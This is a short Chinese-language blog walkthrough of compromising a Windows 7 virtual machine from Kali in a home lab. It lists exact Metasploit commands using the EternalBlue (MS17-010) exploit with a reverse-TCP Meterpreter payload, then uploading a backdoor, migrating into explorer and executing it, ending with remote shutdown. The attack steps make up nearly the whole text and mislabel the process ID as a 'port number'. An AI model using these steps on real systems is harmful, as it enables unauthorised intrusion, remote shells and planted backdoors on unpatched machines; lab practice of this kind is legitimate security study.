我所做的实验在虚拟机上执行,一台win7一台kali,很正常的配备。
启动metasploit
输入 use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.0.254(win7 ip)
set LHOST 192.168.0.2(kali ip)
run
这样就拿到shell
我们用upload 命令将我们的后门程序传入
upload 后门 windows路径
然后我们没法执行程序需要将meterpreter会话进行转入到explorer中去。
用ps 和migrate结合的方式
ps查看该进程端口号
然后migarate 端口号
然后execute -f 后门程序
ok,轻松成功
kali 入侵win7并实现远程关机
最新推荐文章于 2024-05-22 09:58:13 发布